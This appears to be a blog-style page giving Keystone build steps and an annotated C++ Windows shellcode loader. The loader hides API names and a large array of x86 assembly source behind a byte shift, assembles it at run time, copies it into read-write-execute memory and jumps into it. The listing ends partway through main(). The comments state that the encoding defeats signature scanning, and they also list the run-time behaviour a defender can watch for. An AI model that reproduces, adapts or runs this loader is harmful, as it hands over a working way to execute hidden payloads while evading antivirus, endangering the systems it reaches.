源码包
https://github.com/keystone-engine/keystone/archive/0.9.2.zip
-
需要 vs2017 或者其他版本的 IDE -
cmake
mkdir build
cd build
..\nmake-dll.bat
/* test1.c */
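/*
 * Stub with the signature of a Keystone sample helper; it assembles nothing.
 *
 * None of the four arguments is read and no Keystone API is called, so the
 * two calls made from main() have no effect. The locals the original
 * declared (engine handle, error code, output buffer, sizes) were never
 * used and have been dropped.
 *
 * Returns 0 unconditionally.
 */
static int test_ks(ks_arch arch, int mode, const char *assembly, int syntax)
{
    /* Mark the parameters as deliberately unused. */
    (void)arch;
    (void)mode;
    (void)assembly;
    (void)syntax;
    return 0;
}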
// Transfers control to the address passed in `aaaa`.
// The value is loaded into EAX and pushed, and `ret` then pops it as the return
// target, so execution continues at that address without a `call` or `jmp`.
// main() passes the address of the buffer it filled with the assembled bytes.
// NOTE(review): `__asm { }` is MSVC inline assembly, and the address travels in an
// `int`, so this only makes sense in a 32-bit x86 build.
// NOTE(review): nothing in this function returns to its caller in the normal way;
// whether main() ever resumes depends on the code at the target address.
void fuckyou(int aaaa) {
__asm {
mov eax, aaaa
push eax
ret
}
}
// Small string holder whose operator+ returns a byte-shifted copy of the held string.
// Every string main() stores in an S is kept one below its real byte values and is
// restored with `obj + 1` immediately before use, presumably so that the real names and
// the payload text do not appear as plain strings in the compiled binary.
// NOTE(review): there is no destructor; `a` and every buffer returned by operator+ are
// never released by this type.
struct S {
// Heap copy of the string passed to the constructor.
char * a;
// NOTE(review): leaves `a` uninitialized, so operator+ on a default-constructed S
// reads an indeterminate pointer.
S(){}
// Copies `s` into a zero-filled buffer of strlen(s)+20 bytes.
// NOTE(review): `s` must be NUL-terminated, and the malloc result is used unchecked.
S(char* s){
a = (char*)malloc(strlen(s)+20);
memset(a, 0,strlen(s) + 20);
strncpy(a, s, strlen(s));
}
// Returns a new zero-filled malloc buffer holding every byte of `a` with `c` added.
// The buffer is strlen(a)+20 bytes, so the result stays NUL-terminated.
// The caller owns the result; nothing in the visible code frees it.
// NOTE(review): the malloc result is used unchecked, and strlen is re-evaluated on
// every loop iteration.
char* operator+(int c) {
char* b;
b = (char*)malloc(strlen(this->a) + 20);
memset(b, 0,strlen(this->a) + 20);
for (size_t i = 0; i < strlen(this->a); i++) {
b[i]=(this->a)[i]+c;
}
return b;
}
};
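// Sorts arr[0 .. nLength-1] in place into ascending order (bubble sort).
//
// T must be copyable and comparable with operator>. Equal elements keep their
// relative order. A null `arr` or a length below 2 is a no-op.
//
// Compared with the original: each pass stops before the tail that earlier
// passes already put in place, and the loop ends as soon as a pass makes no
// swap. The resulting order is the same.
template<class T>
void Sort(T* arr, int nLength) {
    if (!arr || nLength < 2) {
        return;
    }
    for (int pass = 0; pass < nLength - 1; pass++) {
        bool swapped = false;
        // After `pass` passes the last `pass` elements are final.
        for (int k = 0; k < nLength - 1 - pass; k++) {
            if (arr[k] > arr[k + 1]) {
                T temp = arr[k];
                arr[k] = arr[k + 1];
                arr[k + 1] = temp;
                swapped = true;
            }
        }
        if (!swapped) {
            break;  // already sorted
        }
    }
}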
// Entry point of the sample. In order, it:
//   1. decodes API and DLL names that are stored shifted down by one (see struct S),
//   2. loads keystone.dll and resolves the Keystone entry points and VirtualAlloc by name,
//   3. decodes an embedded block of x86 assembly *text* and assembles it with Keystone,
//   4. copies the resulting machine code into PAGE_EXECUTE_READWRITE memory,
//   5. transfers control to that memory through fuckyou().
//
// Defender notes, limited to what this listing shows:
//   - neither the API names nor any machine code are present in the file as stored, so
//     static string or byte signatures for the payload have nothing to match;
//   - the run-time behaviour is still observable: a load of keystone.dll, GetProcAddress
//     lookups, a VirtualAlloc with PAGE_EXECUTE_READWRITE, a write into that region and
//     execution from it.
int main(int argc, char **argv)
{
// Encoded names; `obj + 1` below adds 1 to every byte. The first five are the Keystone
// exports named in the decltype() expressions, the last two are a DLL name and an export
// of that DLL.
S open((char*)"jr^nodm");
S close((char*)"jr^bknrd");
S free((char*)"jr^eqdd");
S assm((char*)"jr^`rl");
S errnno((char*)"jr^dqqmn");
S kernel32((char*)"Jdqmdk21-ckk");
S virtualalloc((char*)"Uhqst`k@kknb");
// Call to the stub defined above; it has no effect.
test_ks(KS_ARCH_X86, KS_MODE_32, "add eax, ecx", 0);
// NOTE(review): neither hDll nor any GetProcAddress result is checked for NULL
// before the pointers are called.
HMODULE hDll = LoadLibrary("keystone.dll");
// Each `name + 1` allocates a decoded copy that is never freed.
decltype(ks_open)* myks_open = (decltype(ks_open)*)GetProcAddress(hDll, open+1);
decltype(ks_close)* myks_close = (decltype(ks_close)*)GetProcAddress(hDll, close+1);
decltype(ks_free)* myks_free = (decltype(ks_free)*)GetProcAddress(hDll, free + 1);
decltype(ks_asm)* myks_asm = (decltype(ks_asm)*)GetProcAddress(hDll, assm + 1);
decltype(ks_errno)* myks_errno = (decltype(ks_errno)*)GetProcAddress(hDll, errnno + 1);
// VirtualAlloc is resolved by decoded name instead of being called directly.
decltype(VirtualAlloc)* myVirtualAlloc = (decltype(VirtualAlloc)*)GetProcAddress(GetModuleHandle(kernel32 + 1), virtualalloc + 1);
ks_engine *ks;
ks_err err;
size_t count;
unsigned char *encode;
size_t size;
// Encoded payload. Each byte is one less than an ASCII character of ';'-separated x86
// assembly source (the first bytes decode to "cld;call start;"). Presumably this is
// shellcode in source form; the decoded text is deliberately not reproduced here.
// NOTE(review): the array appears to hold as many initializers as its declared size,
// leaving no terminating 0, so the strlen() calls in S's constructor read past its end.
unsigned char fuck[2095] = {
0x62, 0x6B, 0x63, 0x3A, 0x62, 0x60, 0x6B, 0x6B,
0x1F, 0x72, 0x73, 0x60, 0x71, 0x73, 0x3A, 0x60,
0x6F, 0x68, 0x5E, 0x62, 0x60, 0x6B, 0x6B, 0x39,
0x1F, 0x6F, 0x74, 0x72, 0x67, 0x60, 0x63, 0x1F,
0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x61, 0x6F,
0x2B, 0x1F, 0x64, 0x72, 0x6F, 0x3A, 0x77, 0x6E,
0x71, 0x1F, 0x64, 0x60, 0x77, 0x2B, 0x1F, 0x64,
0x60, 0x77, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64,
0x63, 0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71,
0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x65, 0x72,
0x39, 0x5A, 0x64, 0x60, 0x77, 0x1F, 0x2A, 0x1F,
0x2F, 0x77, 0x32, 0x2F, 0x5C, 0x3A, 0x6C, 0x6E,
0x75, 0x1F, 0x64, 0x63, 0x77, 0x2B, 0x1F, 0x63,
0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71,
0x1F, 0x5A, 0x64, 0x63, 0x77, 0x1F, 0x2A, 0x1F,
0x2F, 0x77, 0x62, 0x5C, 0x3A, 0x6C, 0x6E, 0x75,
0x1F, 0x64, 0x63, 0x77, 0x2B, 0x1F, 0x63, 0x76,
0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F,
0x5A, 0x64, 0x63, 0x77, 0x1F, 0x2A, 0x1F, 0x2F,
0x77, 0x30, 0x33, 0x5C, 0x3A, 0x6D, 0x64, 0x77,
0x73, 0x5E, 0x6C, 0x6E, 0x63, 0x39, 0x1F, 0x6C,
0x6E, 0x75, 0x1F, 0x64, 0x72, 0x68, 0x2B, 0x1F,
0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73,
0x71, 0x1F, 0x5A, 0x64, 0x63, 0x77, 0x1F, 0x2A,
0x1F, 0x2F, 0x77, 0x31, 0x37, 0x5C, 0x3A, 0x6C,
0x6E, 0x75, 0x79, 0x77, 0x1F, 0x64, 0x62, 0x77,
0x2B, 0x1F, 0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F,
0x73, 0x71, 0x1F, 0x5A, 0x64, 0x63, 0x77, 0x1F,
0x2A, 0x1F, 0x2F, 0x77, 0x31, 0x35, 0x5C, 0x3A,
0x77, 0x6E, 0x71, 0x1F, 0x64, 0x63, 0x68, 0x2B,
0x1F, 0x64, 0x63, 0x68, 0x3A, 0x6B, 0x6E, 0x6E,
0x6F, 0x5E, 0x6C, 0x6E, 0x63, 0x6D, 0x60, 0x6C,
0x64, 0x39, 0x1F, 0x6B, 0x6E, 0x63, 0x72, 0x61,
0x1F, 0x1F, 0x3A, 0x62, 0x6C, 0x6F, 0x1F, 0x60,
0x6B, 0x2B, 0x1F, 0x2F, 0x77, 0x35, 0x30, 0x3A,
0x69, 0x6B, 0x1F, 0x6D, 0x6E, 0x73, 0x5E, 0x6B,
0x6E, 0x76, 0x64, 0x71, 0x62, 0x60, 0x72, 0x64,
0x3A, 0x72, 0x74, 0x61, 0x1F, 0x60, 0x6B, 0x2B,
0x1F, 0x2F, 0x77, 0x31, 0x2F, 0x3A, 0x6D, 0x6E,
0x73, 0x5E, 0x6B, 0x6E, 0x76, 0x64, 0x71, 0x62,
0x60, 0x72, 0x64, 0x39, 0x1F, 0x71, 0x6E, 0x71,
0x1F, 0x64, 0x63, 0x68, 0x2B, 0x1F, 0x30, 0x32,
0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x63, 0x68,
0x2B, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6B, 0x6E,
0x6E, 0x6F, 0x1F, 0x6B, 0x6E, 0x6E, 0x6F, 0x5E,
0x6C, 0x6E, 0x63, 0x6D, 0x60, 0x6C, 0x64, 0x3A,
0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x63, 0x77,
0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x63,
0x68, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x63,
0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,
0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x63,
0x77, 0x1F, 0x2A, 0x1F, 0x2F, 0x77, 0x30, 0x2F,
0x5C, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x62,
0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,
0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x63,
0x77, 0x1F, 0x2A, 0x1F, 0x2F, 0x77, 0x32, 0x62,
0x5C, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x62,
0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,
0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x62,
0x77, 0x1F, 0x2A, 0x1F, 0x64, 0x63, 0x77, 0x1F,
0x2A, 0x1F, 0x2F, 0x77, 0x36, 0x37, 0x5C, 0x3A,
0x69, 0x64, 0x62, 0x77, 0x79, 0x1F, 0x66, 0x64,
0x73, 0x5E, 0x6D, 0x64, 0x77, 0x73, 0x5E, 0x6C,
0x6E, 0x63, 0x30, 0x3A, 0x60, 0x63, 0x63, 0x1F,
0x64, 0x62, 0x77, 0x2B, 0x1F, 0x64, 0x63, 0x77,
0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x62,
0x77, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x61,
0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,
0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x62,
0x77, 0x1F, 0x2A, 0x1F, 0x2F, 0x77, 0x31, 0x2F,
0x5C, 0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x61,
0x77, 0x2B, 0x1F, 0x64, 0x63, 0x77, 0x3A, 0x6C,
0x6E, 0x75, 0x1F, 0x64, 0x62, 0x77, 0x2B, 0x1F,
0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73,
0x71, 0x1F, 0x5A, 0x64, 0x62, 0x77, 0x1F, 0x2A,
0x1F, 0x2F, 0x77, 0x30, 0x37, 0x5C, 0x3A, 0x66,
0x64, 0x73, 0x5E, 0x6D, 0x64, 0x77, 0x73, 0x5E,
0x65, 0x74, 0x6D, 0x62, 0x39, 0x1F, 0x69, 0x64,
0x62, 0x77, 0x79, 0x1F, 0x66, 0x64, 0x73, 0x5E,
0x6D, 0x64, 0x77, 0x73, 0x5E, 0x6C, 0x6E, 0x63,
0x3A, 0x63, 0x64, 0x62, 0x1F, 0x64, 0x62, 0x77,
0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x72, 0x68,
0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F,
0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x61, 0x77,
0x1F, 0x2A, 0x1F, 0x64, 0x62, 0x77, 0x29, 0x33,
0x5C, 0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x72,
0x68, 0x2B, 0x1F, 0x64, 0x63, 0x77, 0x3A, 0x77,
0x6E, 0x71, 0x1F, 0x64, 0x63, 0x68, 0x2B, 0x1F,
0x64, 0x63, 0x68, 0x3A, 0x6B, 0x6E, 0x6E, 0x6F,
0x5E, 0x65, 0x74, 0x6D, 0x62, 0x6D, 0x60, 0x6C,
0x64, 0x39, 0x1F, 0x6B, 0x6E, 0x63, 0x72, 0x61,
0x1F, 0x1F, 0x3A, 0x71, 0x6E, 0x71, 0x1F, 0x64,
0x63, 0x68, 0x2B, 0x1F, 0x30, 0x32, 0x3A, 0x60,
0x63, 0x63, 0x1F, 0x64, 0x63, 0x68, 0x2B, 0x1F,
0x64, 0x60, 0x77, 0x3A, 0x62, 0x6C, 0x6F, 0x1F,
0x60, 0x6B, 0x2B, 0x1F, 0x60, 0x67, 0x3A, 0x69,
0x6D, 0x64, 0x1F, 0x6B, 0x6E, 0x6E, 0x6F, 0x5E,
0x65, 0x74, 0x6D, 0x62, 0x6D, 0x60, 0x6C, 0x64,
0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x63, 0x68,
0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F,
0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x61, 0x6F,
0x1F, 0x2C, 0x1F, 0x37, 0x5C, 0x3A, 0x62, 0x6C,
0x6F, 0x1F, 0x64, 0x63, 0x68, 0x2B, 0x1F, 0x63,
0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71,
0x1F, 0x5A, 0x64, 0x61, 0x6F, 0x1F, 0x2A, 0x1F,
0x2F, 0x77, 0x31, 0x33, 0x5C, 0x3A, 0x69, 0x6D,
0x79, 0x1F, 0x66, 0x64, 0x73, 0x5E, 0x6D, 0x64,
0x77, 0x73, 0x5E, 0x65, 0x74, 0x6D, 0x62, 0x3A,
0x6F, 0x6E, 0x6F, 0x1F, 0x64, 0x60, 0x77, 0x3A,
0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x61, 0x77, 0x2B,
0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F,
0x73, 0x71, 0x1F, 0x5A, 0x64, 0x60, 0x77, 0x1F,
0x2A, 0x1F, 0x2F, 0x77, 0x31, 0x33, 0x5C, 0x3A,
0x60, 0x63, 0x63, 0x1F, 0x64, 0x61, 0x77, 0x2B,
0x1F, 0x64, 0x63, 0x77, 0x3A, 0x6C, 0x6E, 0x75,
0x1F, 0x62, 0x77, 0x2B, 0x1F, 0x76, 0x6E, 0x71,
0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64,
0x61, 0x77, 0x1F, 0x2A, 0x1F, 0x64, 0x62, 0x77,
0x29, 0x31, 0x5C, 0x3A, 0x6C, 0x6E, 0x75, 0x1F,
0x64, 0x61, 0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E,
0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A,
0x64, 0x60, 0x77, 0x1F, 0x2A, 0x1F, 0x2F, 0x77,
0x30, 0x62, 0x5C, 0x3A, 0x60, 0x63, 0x63, 0x1F,
0x64, 0x61, 0x77, 0x2B, 0x1F, 0x64, 0x63, 0x77,
0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x60, 0x77,
0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F,
0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x61, 0x77,
0x1F, 0x2A, 0x1F, 0x64, 0x62, 0x77, 0x29, 0x33,
0x5C, 0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x60,
0x77, 0x2B, 0x1F, 0x64, 0x63, 0x77, 0x3A, 0x65,
0x68, 0x6D, 0x68, 0x72, 0x67, 0x39, 0x1F, 0x6C,
0x6E, 0x75, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,
0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x72,
0x6F, 0x1F, 0x2A, 0x1F, 0x2F, 0x77, 0x31, 0x33,
0x5C, 0x2B, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6F,
0x6E, 0x6F, 0x1F, 0x64, 0x61, 0x77, 0x3A, 0x6F,
0x6E, 0x6F, 0x1F, 0x64, 0x61, 0x77, 0x3A, 0x6F,
0x6E, 0x6F, 0x60, 0x63, 0x1F, 0x1F, 0x3A, 0x6F,
0x6E, 0x6F, 0x1F, 0x64, 0x62, 0x77, 0x3A, 0x6F,
0x6E, 0x6F, 0x1F, 0x64, 0x63, 0x77, 0x3A, 0x6F,
0x74, 0x72, 0x67, 0x1F, 0x64, 0x62, 0x77, 0x3A,
0x69, 0x6C, 0x6F, 0x1F, 0x64, 0x60, 0x77, 0x3A,
0x66, 0x64, 0x73, 0x5E, 0x6D, 0x64, 0x77, 0x73,
0x5E, 0x6C, 0x6E, 0x63, 0x39, 0x1F, 0x6F, 0x6E,
0x6F, 0x1F, 0x64, 0x63, 0x68, 0x3A, 0x66, 0x64,
0x73, 0x5E, 0x6D, 0x64, 0x77, 0x73, 0x5E, 0x6C,
0x6E, 0x63, 0x30, 0x39, 0x1F, 0x6F, 0x6E, 0x6F,
0x1F, 0x64, 0x63, 0x68, 0x3A, 0x6F, 0x6E, 0x6F,
0x1F, 0x64, 0x63, 0x77, 0x3A, 0x6C, 0x6E, 0x75,
0x1F, 0x64, 0x63, 0x77, 0x2B, 0x1F, 0x63, 0x76,
0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F,
0x5A, 0x64, 0x63, 0x77, 0x5C, 0x3A, 0x69, 0x6C,
0x6F, 0x1F, 0x6D, 0x64, 0x77, 0x73, 0x5E, 0x6C,
0x6E, 0x63, 0x3A, 0x72, 0x73, 0x60, 0x71, 0x73,
0x39, 0x1F, 0x6F, 0x6E, 0x6F, 0x1F, 0x64, 0x61,
0x6F, 0x3A, 0x71, 0x64, 0x75, 0x64, 0x71, 0x72,
0x64, 0x5E, 0x73, 0x62, 0x6F, 0x39, 0x1F, 0x6F,
0x74, 0x72, 0x67, 0x1F, 0x2F, 0x77, 0x32, 0x31,
0x32, 0x32, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,
0x2F, 0x77, 0x34, 0x65, 0x32, 0x31, 0x36, 0x32,
0x36, 0x36, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,
0x64, 0x72, 0x6F, 0x3A, 0x6F, 0x74, 0x72, 0x67,
0x1F, 0x2F, 0x77, 0x36, 0x31, 0x35, 0x36, 0x36,
0x33, 0x62, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64,
0x60, 0x77, 0x2B, 0x1F, 0x64, 0x61, 0x6F, 0x3A,
0x62, 0x60, 0x6B, 0x6B, 0x1F, 0x64, 0x60, 0x77,
0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x60, 0x77,
0x2B, 0x1F, 0x2F, 0x77, 0x2F, 0x30, 0x38, 0x2F,
0x3A, 0x72, 0x74, 0x61, 0x1F, 0x64, 0x72, 0x6F,
0x2B, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6F, 0x74,
0x72, 0x67, 0x1F, 0x64, 0x72, 0x6F, 0x3A, 0x6F,
0x74, 0x72, 0x67, 0x1F, 0x64, 0x60, 0x77, 0x3A,
0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F, 0x77, 0x35,
0x61, 0x37, 0x2F, 0x31, 0x38, 0x3A, 0x62, 0x60,
0x6B, 0x6B, 0x1F, 0x64, 0x61, 0x6F, 0x3A, 0x72,
0x64, 0x73, 0x5E, 0x60, 0x63, 0x63, 0x71, 0x64,
0x72, 0x72, 0x39, 0x1F, 0x6F, 0x74, 0x72, 0x67,
0x1F, 0x2F, 0x77, 0x60, 0x3A, 0x62, 0x71, 0x64,
0x60, 0x73, 0x64, 0x5E, 0x72, 0x6E, 0x62, 0x6A,
0x64, 0x73, 0x39, 0x1F, 0x6F, 0x74, 0x72, 0x67,
0x1F, 0x2F, 0x77, 0x30, 0x2F, 0x2F, 0x2F, 0x2F,
0x36, 0x65, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,
0x2F, 0x77, 0x34, 0x62, 0x30, 0x30, 0x2F, 0x2F,
0x2F, 0x31, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64,
0x72, 0x68, 0x2B, 0x1F, 0x64, 0x72, 0x6F, 0x3A,
0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x60, 0x77,
0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x60,
0x77, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64,
0x60, 0x77, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,
0x64, 0x60, 0x77, 0x3A, 0x68, 0x6D, 0x62, 0x1F,
0x64, 0x60, 0x77, 0x3A, 0x6F, 0x74, 0x72, 0x67,
0x1F, 0x64, 0x60, 0x77, 0x3A, 0x68, 0x6D, 0x62,
0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6F, 0x74, 0x72,
0x67, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6F, 0x74,
0x72, 0x67, 0x1F, 0x2F, 0x77, 0x64, 0x2F, 0x63,
0x65, 0x2F, 0x65, 0x64, 0x60, 0x3A, 0x62, 0x60,
0x6B, 0x6B, 0x1F, 0x64, 0x61, 0x6F, 0x3A, 0x77,
0x62, 0x67, 0x66, 0x1F, 0x64, 0x63, 0x68, 0x2B,
0x1F, 0x64, 0x60, 0x77, 0x3A, 0x73, 0x71, 0x78,
0x5E, 0x62, 0x6E, 0x6D, 0x6D, 0x64, 0x62, 0x73,
0x39, 0x1F, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x30,
0x35, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64,
0x72, 0x68, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,
0x64, 0x63, 0x68, 0x3A, 0x6F, 0x74, 0x72, 0x67,
0x1F, 0x2F, 0x77, 0x35, 0x30, 0x36, 0x33, 0x60,
0x34, 0x38, 0x38, 0x3A, 0x62, 0x60, 0x6B, 0x6B,
0x1F, 0x64, 0x61, 0x6F, 0x3A, 0x73, 0x64, 0x72,
0x73, 0x1F, 0x64, 0x60, 0x77, 0x2B, 0x64, 0x60,
0x77, 0x3A, 0x69, 0x79, 0x1F, 0x62, 0x6E, 0x6D,
0x6D, 0x64, 0x62, 0x73, 0x64, 0x63, 0x3A, 0x67,
0x60, 0x6D, 0x63, 0x6B, 0x64, 0x5E, 0x62, 0x6E,
0x6D, 0x6D, 0x64, 0x62, 0x73, 0x5E, 0x65, 0x60,
0x68, 0x6B, 0x74, 0x71, 0x64, 0x39, 0x1F, 0x63,
0x64, 0x62, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,
0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x72,
0x68, 0x1F, 0x2A, 0x1F, 0x37, 0x5C, 0x3A, 0x69,
0x6D, 0x79, 0x1F, 0x73, 0x71, 0x78, 0x5E, 0x62,
0x6E, 0x6D, 0x6D, 0x64, 0x62, 0x73, 0x3A, 0x65,
0x60, 0x68, 0x6B, 0x74, 0x71, 0x64, 0x39, 0x1F,
0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F, 0x77, 0x34,
0x35, 0x40, 0x31, 0x41, 0x34, 0x45, 0x2F, 0x3A,
0x62, 0x60, 0x6B, 0x6B, 0x1F, 0x64, 0x61, 0x6F,
0x3A, 0x62, 0x6E, 0x6D, 0x6D, 0x64, 0x62, 0x73,
0x64, 0x63, 0x39, 0x1F, 0x71, 0x64, 0x62, 0x75,
0x39, 0x1F, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F,
0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x33, 0x3A,
0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x72, 0x68,
0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x63,
0x68, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F,
0x77, 0x34, 0x65, 0x62, 0x37, 0x63, 0x38, 0x2F,
0x31, 0x3A, 0x62, 0x60, 0x6B, 0x6B, 0x1F, 0x64,
0x61, 0x6F, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64,
0x72, 0x68, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71,
0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64,
0x72, 0x68, 0x5C, 0x3A, 0x6F, 0x74, 0x72, 0x67,
0x1F, 0x2F, 0x77, 0x33, 0x2F, 0x3A, 0x6F, 0x74,
0x72, 0x67, 0x1F, 0x2F, 0x77, 0x30, 0x2F, 0x2F,
0x2F, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64,
0x72, 0x68, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,
0x2F, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F,
0x77, 0x64, 0x34, 0x34, 0x32, 0x60, 0x33, 0x34,
0x37, 0x3A, 0x62, 0x60, 0x6B, 0x6B, 0x1F, 0x64,
0x61, 0x6F, 0x3A, 0x77, 0x62, 0x67, 0x66, 0x1F,
0x64, 0x61, 0x77, 0x2B, 0x1F, 0x64, 0x60, 0x77,
0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x61,
0x77, 0x3A, 0x71, 0x64, 0x60, 0x63, 0x5E, 0x6C,
0x6E, 0x71, 0x64, 0x39, 0x1F, 0x6F, 0x74, 0x72,
0x67, 0x1F, 0x2F, 0x3A, 0x6F, 0x74, 0x72, 0x67,
0x1F, 0x64, 0x72, 0x68, 0x3A, 0x6F, 0x74, 0x72,
0x67, 0x1F, 0x64, 0x61, 0x77, 0x3A, 0x6F, 0x74,
0x72, 0x67, 0x1F, 0x64, 0x63, 0x68, 0x3A, 0x6F,
0x74, 0x72, 0x67, 0x1F, 0x2F, 0x77, 0x34, 0x65,
0x62, 0x37, 0x63, 0x38, 0x2F, 0x31, 0x3A, 0x62,
0x60, 0x6B, 0x6B, 0x1F, 0x64, 0x61, 0x6F, 0x3A,
0x71, 0x64, 0x60, 0x63, 0x5E, 0x72, 0x74, 0x62,
0x62, 0x64, 0x72, 0x72, 0x65, 0x74, 0x6B, 0x39,
0x1F, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x61, 0x77,
0x2B, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x72, 0x74,
0x61, 0x1F, 0x64, 0x72, 0x68, 0x2B, 0x1F, 0x64,
0x60, 0x77, 0x3A, 0x69, 0x6D, 0x79, 0x1F, 0x71,
0x64, 0x60, 0x63, 0x5E, 0x6C, 0x6E, 0x71, 0x64,
0x3A, 0x71, 0x64, 0x73, 0x1F, 0x1F, 0x3A
};
// Wrap the encoded bytes and decode them with +1; CODE is the assembly text handed to
// Keystone. NOTE(review): `fck` is never deleted and CODE is never freed.
S* fck= new S((char*)fuck);
char* CODE = *fck + 1;
// Open a 32-bit x86 Keystone engine through the dynamically resolved pointer.
err = myks_open(KS_ARCH_X86, KS_MODE_32, &ks);
if (err != KS_ERR_OK) {
// NOTE(review): "quitn" here, and the trailing "n" in the other messages below, look
// like `\n` escapes that lost their backslash when the page was extracted.
printf("ERROR: failed on ks_open(), quitn");
return -1;
}
// Second call to the stub; it has no effect.
test_ks(KS_ARCH_X86, KS_MODE_32, "add eax, ecx", 0);
// Assemble the decoded text; on success `encode` and `size` describe the machine code.
// NOTE(review): on failure execution still falls through to the allocation and copy
// below, which then read `size` and `encode` uninitialized.
if (myks_asm(ks, CODE, 0, &encode, &size, &count) != KS_ERR_OK) {
// NOTE(review): `count` is a size_t printed with %lu; %zu is the matching specifier.
printf("ERROR: ks_asm() failed & count = %lu, error = %un",
count, myks_errno(ks));
}
else {
size_t i;
// Prints the decoded assembly text followed by a hex dump of the assembled bytes.
printf("%s = ", CODE);
for (i = 0; i < size; i++) {
printf("%02x ", encode[i]);
}
printf("n");
printf("Compiled: %lu bytes, statements: %lun", size, count);
}
// Allocate size+1 bytes that are readable, writable and executable at once, then copy
// the assembled bytes in. An RWX allocation that is written and then executed is the
// behaviour memory-protection and EDR tooling typically watches for.
// NOTE(review): the allocation result is not checked before it is written to.
PBYTE a = (PBYTE)myVirtualAlloc(NULL, size + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
for (size_t i = 0; i < size; i++) {
a[i] = encode[i];
}
